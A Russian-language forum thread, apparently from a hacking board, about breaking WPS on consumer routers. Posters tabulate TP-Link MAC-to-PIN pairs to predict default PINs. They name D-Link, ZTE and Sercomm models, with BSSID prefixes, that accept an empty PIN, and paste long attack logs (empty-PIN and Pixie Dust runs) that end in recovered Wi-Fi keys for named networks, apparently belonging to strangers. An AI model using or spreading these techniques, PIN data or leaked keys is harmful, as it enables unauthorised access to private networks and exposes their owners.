Ой, да ну его... Он там с какой-то андроид перделки пытается подключиться, говорит, получает ошибку, что сигнал слабый, но на самом деле сигнал норм.
Еще один интересный кусок тп-линков в базе нашел. Если последний символ совпадает, а в маке различается предпоследний, то и первая цифра пина или совпадет, или будет +- 1. Не совпадение, уже не первый такой блок находил в базе. F8:1A:67:C3:37_6A 65399644 F8:1A:67:C3:37_DA 61564862 F8:1A:67:C3:37_FA 51835606 F8:1A:67:C3:37_BC 77362926 F8:1A:67:C3:37_3C 66252450 у этих не сходится начало, но сходится паттерн F8:1A:67:C3:37:E2 49292534 F8:1A:67:C3:37:72 07570698 может еще чего нить интересного найду.
И на закуску красивый мак и красивый пин от нее 90:f6:52:aa:ec:af 91916167 wa701nd в базе в этом диапазоне все с wifi map, а жаль, там 2 интересные точки есть. ищем что то похожее в базе 64:66:b3:36:3f:ca 81817177 wr740n и сразу 64:66:B3:36:36:F2 28583653 64:66:B3:36:33:F6 37573027 64:66:B3:36:3B:54 47461512 (!!) 64:66:B3:36:38:EA 72747018 5 точек с одной маской совпала последняя цифра - совпало начало. 64:66:B3:36:39:22 03793930 64:66:B3:36:39:52 07217470 64:66:B3:36:30:92 09469594 64:66:B3:36:39:54 21705052 64:66:B3:36:3B:44 21895944 64:66:B3:36:39:14 25091137 64:66:B3:36:3B:54 47461512 64:66:B3:36:3A:64 49212716 64:66:B3:36:39:44 50371976 тут наблюдается другое - чем ниже 3 с конца число, тем больше сам пин (в = 47; а = 49; 9 = 50). то же и в других блоках попадается, но не всегда. еще 64:66:B3:2D:C9:14 68683030 wa830re и в базе 64:66:B3:2D:C2:FA 63621914 (?? почему опять 4 цифра отличается на -1 как и в прошлом примере??) 64:66:B3:2D:C9:E5 05054442 чтобы рыть дальше, нужен дамп всех туполинков с базы в формате mac-pin, а еще больше нужна помощь человека с мозгами.
На D-Link DIR-815 (пробил по 3wifi) не получается получить пароль (имея валидный пин) [+] Sending M2 message [+] Received M3 message [+] Sending M4 message [+] Received WSC NACK [+] Sending WSC NACK [+] Quitting after 1 crack attempts [-] Failed to recover WPA key [*] String pin was specified, nothing to save. В чём проблема может быть?
Мешает то, что "подключиться с помощью PIN" есть ничто иное, как получить пароль с помощью PIN, и затем подключиться с этим паролем, что человек выше и пытается проделать. Многие подобные на NRU прошивке не отдают пароль даже по правильному пину. Но иногда на них пароль совпадает с этим пином.
И еще немножко совпадений E8:94:F6:2E:CB:10 64484570 E8:94:F6:2E:CB:80 65445181 тут конец не совпал, но пин близок к предыдущим. E8:94:F6:2E:CB:F4 69438813
Новости в сфере пин кодов. Маршрутизаторы D-Link DIR-620 от Ростелекома (BSSID E4:6F:13:*) уязвимы к пустому пин коду. Проверено на практике: https://forum.antichat.ru/posts/4122981
И роутеры ZTE ZXHN H118N тоже! Spoiler: BSSID 74:B5:7E:* Code: [*] Audit started. [*] Associating with AP... [+] Associated successfully. [*] Trying pin ""... [*] Sending EAPOL Start... [*] Received Identity Request. [*] Sending Identity Response... [*] Received WPS Message M1. [*] E-Nonce: 6DDA2C0103BB28624169DCAC0B4D3D20 [*] PKE: D0141B15656E96B85FCEAD2E8E76330D2B1AC1576BB026E7A328C0E1BAF8CF91664371174C08EE12EC92B0519C54879F21255BE5A8770E1FA1880470EF423C90E34D7847A6FCB4924563D1AF1DB0C481EAD9852C519BF1DD429C163951CF69181B132AEA2A3684CAF35BC54ACA1B20C88BB3B7339FF7D56E09139D77F0AC58079097938251DBBE75E86715CC6B7C0CA945FA8DD8D661BEB73B414032798DADEE32B5DD61BF105F18D89217760B75C5D966A5A490472CEBA9E3B4224F3D89FB2B [*] Manufacturer: ZTE Corporation [*] Model Name: ZXHN H118N [*] Model Number: ZXHN H118N [*] Serial Number: 123456789012347 [*] Device Name: ADSL Modem/Router [*] Sending WPS Message M2... [*] R-Nonce: 733D35864C79F206ABBED593FEB8A6EA [*] PKR: CE733463B55D3C410E59949D94F0B95FFF816DC2CBD27F0832F010121143F37FEBE96A22E7B43C1A4CCE45BBCDFE48A55BCACE804C0643286208DE9F620C9F8DF6B91D1F1AD7EB9398B49E28CCFA1349DFCB11943A6D6F40FC52C76BEDB2FECC516906A4C4FFF0C10AE337EF9F82E9AA4B695B3707256B4E13CEEA0E19B29E2B35BDFA8E09BD60F2B3FF78E9B3BD2A0A7D97B633A0046134BFC03C18AADA6A002C60709A56191DB258025C9249BB0668BFE45078F4AAA32E937FB88A802850BC [*] AuthKey: 06C01B8D83A4B25EA741980E912F59F3687D22D277526F7F12774BDECDBB16E0 [*] Received WPS Message M3. [*] E-Hash1: 2FA02BFDBE2FC4010C6C655870CC8FABB651F930401C61BB23C28A04597F163F [*] E-Hash2: 2FA02BFDBE2FC4010C6C655870CC8FABB651F930401C61BB23C28A04597F163F [*] Sending WPS Message M4... [*] Received WPS Message M5. [+] First half found: <empty> [*] Sending WPS Message M6... [*] Received WPS Message M7. [*] Sending WSC NACK... [-] Request timed out. [*] Sending WSC NACK... [-] Request timed out. [*] Sending WSC NACK... [-] Session timed out. [+] WPS PIN: <empty> [+] SSID: RT-WiFi_46FC [+] Key: 9035000440 [+] Key Index: 01 [*] Audit stopped.
А ещё D-Link DIR-825AC, и заметьте, с каким упорством, но добылась! Spoiler: BSSID 80:26:89:* Code: [*] Audit started. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [+] Associated successfully. [*] Trying pin "06540883"... [*] Sending EAPOL Start... [-] Request timed out. [*] Trying pin "06540883"... [*] Sending EAPOL Start... [*] Received Identity Request. [*] Sending Identity Response... [*] Received WPS Message M1. [*] E-Nonce: A4D079E8DC0FFF2BED9BFBB6F769E775 [*] PKE: D0141B15656E96B85FCEAD2E8E76330D2B1AC1576BB026E7A328C0E1BAF8CF91664371174C08EE12EC92B0519C54879F21255BE5A8770E1FA1880470EF423C90E34D7847A6FCB4924563D1AF1DB0C481EAD9852C519BF1DD429C163951CF69181B132AEA2A3684CAF35BC54ACA1B20C88BB3B7339FF7D56E09139D77F0AC58079097938251DBBE75E86715CC6B7C0CA945FA8DD8D661BEB73B414032798DADEE32B5DD61BF105F18D89217760B75C5D966A5A490472CEBA9E3B4224F3D89FB2B [*] Manufacturer: D-Link Systems [*] Model Name: DIR-825AC [*] Model Number: DIR-825AC [*] Serial Number: 123456789012347 [*] Device Name: DIR-825AC [*] Sending WPS Message M2... [*] R-Nonce: 956581FBC3D8332D6CF673EC84B7FD1B [*] PKR: F5F72C0DD8C32129A0D59E340636D4F3D59DAF36EFD39C73EF021CB2501BAA13D56C67994EEB4A266DA44EB0D9E1FA34A5422CA5B359686A8F80336705E5E5F772BEBE9C421CEF21EFAC70D778580E66CD5753EF5A62DA91CFD68469FB87469860BA76BD18B2EB2B0454554154EE4700D68D0143CAAC08E51B02E7EC3A6A2B96D8F77A541CD5CBDDB1CD8F750A823F8B83E6CFFA142BB3798980D59C03E355B931D2A311DE78C4D2494CE87E9D42C85ACB39F747454946C313F68F9EDE425372 [*] AuthKey: 9F5DB6F5AC0CE6C1C71259C251DB57AE6321302AABEE76277BB0D67D3DB7AAA7 [*] Received WPS Message M1. [*] E-Nonce: A4D079E8DC0FFF2BED9BFBB6F769E775 [*] PKE: D0141B15656E96B85FCEAD2E8E76330D2B1AC1576BB026E7A328C0E1BAF8CF91664371174C08EE12EC92B0519C54879F21255BE5A8770E1FA1880470EF423C90E34D7847A6FCB4924563D1AF1DB0C481EAD9852C519BF1DD429C163951CF69181B132AEA2A3684CAF35BC54ACA1B20C88BB3B7339FF7D56E09139D77F0AC58079097938251DBBE75E86715CC6B7C0CA945FA8DD8D661BEB73B414032798DADEE32B5DD61BF105F18D89217760B75C5D966A5A490472CEBA9E3B4224F3D89FB2B [*] Sending WPS Message M2... [*] R-Nonce: 956581FBC3D8332D6CF673EC84B7FD1B [*] PKR: F5F72C0DD8C32129A0D59E340636D4F3D59DAF36EFD39C73EF021CB2501BAA13D56C67994EEB4A266DA44EB0D9E1FA34A5422CA5B359686A8F80336705E5E5F772BEBE9C421CEF21EFAC70D778580E66CD5753EF5A62DA91CFD68469FB87469860BA76BD18B2EB2B0454554154EE4700D68D0143CAAC08E51B02E7EC3A6A2B96D8F77A541CD5CBDDB1CD8F750A823F8B83E6CFFA142BB3798980D59C03E355B931D2A311DE78C4D2494CE87E9D42C85ACB39F747454946C313F68F9EDE425372 [*] AuthKey: 9F5DB6F5AC0CE6C1C71259C251DB57AE6321302AABEE76277BB0D67D3DB7AAA7 [*] Received WPS Message M3. [*] E-Hash1: D88F7A4B3387DBC49FB4B5338708046A23106EFFFC75456CC64AB1A22A236D4C [*] E-Hash2: 4B7E9E88690957B81698F2C14111757F0467AF1B9531DF88380530B17A5B6752 [*] Sending WPS Message M4... [*] Received WSC NACK. [-] Error: Wrong PIN code. [*] Sending WSC NACK... [*] EAP session closed. [*] Starting Pixie Dust attack... [-] Pixie Dust PIN not found. [*] Trying pin ""... [*] Sending EAPOL Start... [-] Request timed out. [*] Trying pin ""... [*] Sending EAPOL Start... [+] Associated successfully. [-] Request timed out. [*] Reconnecting... [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [+] Associated successfully. [*] Trying pin ""... [*] Sending EAPOL Start... [*] Received Identity Request. [*] Sending Identity Response... [-] Request timed out. [*] Sending Identity Response... [-] Request timed out. [*] Sending Identity Response... [-] Session timed out. [*] Trying pin ""... [+] Associated successfully. [*] Reconnecting... [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [+] Associated successfully. [*] Trying pin ""... [*] Sending EAPOL Start... [*] Received Identity Request. [*] Sending Identity Response... [-] Request timed out. [*] Sending Identity Response... [-] Request timed out. [*] Sending Identity Response... [-] Session timed out. [*] Trying pin ""... [+] Associated successfully. [*] Reconnecting... [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [+] Associated successfully. [*] Trying pin ""... [*] Sending EAPOL Start... [*] Received Identity Request. [*] Sending Identity Response... [*] Received Identity Request. [*] Sending Identity Response... [-] Request timed out. [*] Sending Identity Response... [-] Request timed out. [*] Sending Identity Response... [+] Associated successfully. [-] Request timed out. [*] Reconnecting... [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [+] Associated successfully. [*] Trying pin ""... [*] Sending EAPOL Start... [-] Request timed out. [*] Trying pin ""... [*] Sending EAPOL Start... [-] Request timed out. [*] Trying pin ""... [*] Sending EAPOL Start... [-] Request timed out. [*] Trying pin ""... [*] Sending EAPOL Start... [-] Request timed out. [*] Trying pin ""... [*] Sending EAPOL Start... [-] Request timed out. [*] Trying pin ""... [+] Associated successfully. [*] Reconnecting... [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [+] Associated successfully. [*] Trying pin ""... [*] Sending EAPOL Start... [*] Received Identity Request. [*] Sending Identity Response... [-] Request timed out. [*] Sending Identity Response... [-] Request timed out. [*] Sending Identity Response... [-] Session timed out. [*] Trying pin ""... [*] Sending EAPOL Start... [-] Request timed out. [*] Trying pin ""... [*] Sending EAPOL Start... [*] Received Identity Request. [*] Sending Identity Response... [-] Request timed out. [*] Sending Identity Response... [-] Request timed out. [*] Sending Identity Response... [+] Associated successfully. [-] Request timed out. [*] Reconnecting... [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [+] Associated successfully. [*] Trying pin ""... [*] Sending EAPOL Start... [*] Received Identity Request. [*] Sending Identity Response... [-] Request timed out. [*] Sending Identity Response... [-] Request timed out. [*] Sending Identity Response... [-] Session timed out. [*] Trying pin ""... [*] Sending EAPOL Start... [-] Request timed out. [*] Trying pin ""... [*] Sending EAPOL Start... [+] Associated successfully. [-] Request timed out. [*] Reconnecting... [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [+] Associated successfully. [*] Trying pin ""... [*] Sending EAPOL Start... [-] Request timed out. [*] Trying pin ""... [*] Sending EAPOL Start... [*] Received Identity Request. [*] Sending Identity Response... [*] Received Identity Request. [*] Sending Identity Response... [*] Received WPS Message M1. [*] Sending WPS Message M2... [*] Received WPS Message M1. [*] Sending WPS Message M2... [-] Request timed out. [*] Sending WPS Message M2... [*] Received WPS Message M3. [*] Sending WPS Message M4... [*] Received WPS Message M3. [*] Sending WPS Message M4... [*] Received WPS Message M5. [+] First half found: <empty> [*] Sending WPS Message M6... [*] Received WPS Message M5. [+] First half found: <empty> [*] Sending WPS Message M6... [-] Request timed out. [*] Sending WPS Message M6... [*] Received WPS Message M7. [*] Sending WSC NACK... [*] EAP session closed. [+] WPS PIN: <empty> [+] SSID: Liliya [+] Key: 8 <спрятал номер телефона> [+] Key Index: 01 [*] Audit stopped.
С флагом -p "" (несколько страниц назад было). А ещё я тут внезапно нашёл Sercomm RV6688BCM, которые обычно поддаются Pixie Dust... но на этот раз попался с пустым пином! Spoiler: Лог Code: [*] Audit started. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [+] Associated successfully. [*] Trying pin "12345670"... [*] Sending EAPOL Start... [*] Received Identity Request. [*] Sending Identity Response... [*] Received WPS Message M1. [*] E-Nonce: 136F70913C5A8B74225978490E93239C [*] PKE: 0FB2D266E52270D3864CA09700FD11124283FCF835118C455512192D398729C2C7B9AAA3E49A87ADEDA99DB0872E6295CBC188AA18E7E54B83D75FB2632EF786D76E8296B13E9AAFD55ECBD521B08E394DD01B623B4A49F2F3D112EA0CE1611974C527B0EF25DC739D2500AEEAEA2E65DCA7E264D5CD231E20B4B495C003E8FBC3C440B2BB2BFDE8BBF34EE2970F60FDF425D4198C35417111A01DBDF04E2A465F1C80AB502B64D52A7714327B93F39DBC0173BE280B78EB593FA5F130B1CC8E [*] Manufacturer: SERCOMM [*] Model Name: RV6688BCM [*] Model Number: RV6688BCM [*] Serial Number: 53434F4D14104997 [*] Device Name: RV6688BCM [*] Sending WPS Message M2... [*] R-Nonce: 4B82C0F1E6431FBD116BB37870AE2B4E [*] PKR: 971CB3AC567472A7C62FBAD38998FE84F769E4F18602D9BBFE0667C0FD4EDD88AECCF65C24CD0E1A8F5DF0B33068CD2D5258A12E92909F9008B45858BE716C924AC2ABF6C29BA8DEA801BD77BD8DA8A5EB9C7392B508C28C36CFDB43CC1469DFDFE3BB7DB29D5F5F8DA257FF6B802B66068D8242F9A3125AC64796141D0BC7EE3D9BCBF2FD3A7D1B19A53183B41E6654A6A1BA946D4D71E55D25A1E2925606FAE6BA5FA2828FD3B98BF39801F1E1844742F93C5068B9E9A40CF2444BB07E6DD4 [*] AuthKey: CA808543C03093432C15F8AAF2C7D7414A63065E9D9C0E0216DBE88E008E54EF [*] Received WPS Message M3. [*] E-Hash1: E56F292D3C9BE82A8702EB2A1435F9CC404ABE8D7E7737D72946FB09D4FBAD75 [*] E-Hash2: E56F292D3C9BE82A8702EB2A1435F9CC404ABE8D7E7737D72946FB09D4FBAD75 [*] This AP is potentially vulnerable to the "empty string" pin. [*] To specify <empty> pin, add empty line to PINs list and disable checksum calculation. [*] Also in this case the pin can have two same halfs (e.g. 00000000). [*] Sending WPS Message M4... [*] Received WSC NACK. [-] Error: Wrong PIN code. [*] Sending WSC NACK... [-] Request timed out. [*] Sending WSC NACK... [-] Request timed out. [*] Sending WSC NACK... [-] Session timed out. [*] Starting Pixie Dust attack... [*] The AP /might be/ vulnerable. [*] Try again with --force or with another (newer) set of data. [*] Also ensure that the date time and time zone on your computer are set correctly. [*] Audit stopped. [*] Audit started. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [-] Association failed. [*] Associating with AP... [+] Associated successfully. [*] Trying pin ""... [*] Sending EAPOL Start... [*] Received Identity Request. [*] Sending Identity Response... [*] Received WPS Message M1. [*] E-Nonce: 53DDC768720082F141C35BF4051E4F48 [*] PKE: 2DC9A4EE82191F650548A09FE72993E75FC33944454D54D36C1A94C413F9AE3698245EB9C0BD5758E97CD15DD7264B19E22E088D567077D8883835B1F206A29E26C123949F8E8F1ED719FF49C92B1A778EDB3AB32174862451C5A8A978552D907FFFF2E759B120B1067664101C482A7321C5EA020F8DBDAAB06AC4FA55EA96F5EFE3C919FD7198EE5AD9512C97B91930A36E0FEECF5390DB8ABFA62FE922D312887F0CACF2EFEB6B2B20F0E2D3E9CDE34F79B87F352932D8D69389B248475803 [*] Manufacturer: SERCOMM [*] Model Name: RV6688BCM [*] Model Number: RV6688BCM [*] Serial Number: 53434F4D14104997 [*] Device Name: RV6688BCM [*] Sending WPS Message M2... [*] R-Nonce: 0A5920DB91A74631739A26BE87711D96 [*] PKR: 6A23E76D3D13B67BA56AEC2277580CE736567A0AD400EE03DED57CFD0454D6A1436F6309A2E33FF9404D376F10B65E5D01CC30E9DE9CB4DD1A625A11A59A2D7179D46DF1749A659799B5C23263D87225F9363C53F64C84750B34175AFC7AB2DBD3EB6092EE5C703F3245B5E2C2A071EF6D5439A5D8AB53D5F34608E2984FCA19829D9D1FBF2FA185A60F3173BF9111777054B7C9E616AB2061DE255F92550100A6B7F65F7623878384F0B2FDE8AE37D5D82D0FD59A3C3A1186CD2CA5DFE6DB03 [*] AuthKey: 23DB14DBE508E911E4B185298C17B168EBB3AA7A6FB7369FCB7D2A9DE589CADC [*] Received WPS Message M3. [*] E-Hash1: 8799E7C5674192252389D749E42801B8C1BD47BE6904CE96274223FE05EE22A3 [*] E-Hash2: 8799E7C5674192252389D749E42801B8C1BD47BE6904CE96274223FE05EE22A3 [*] Sending WPS Message M4... [*] Received WPS Message M5. [+] First half found: <empty> [*] Sending WPS Message M6... [*] Received WPS Message M7. [*] Sending WSC NACK... [*] EAP session closed. [+] WPS PIN: <empty> [+] SSID: MGTS_GPON_4997 [+] Key: XSA6P4XF [+] Key Index: 1 [*] Audit stopped. RS оповещает о потенциальном пустом пине, да.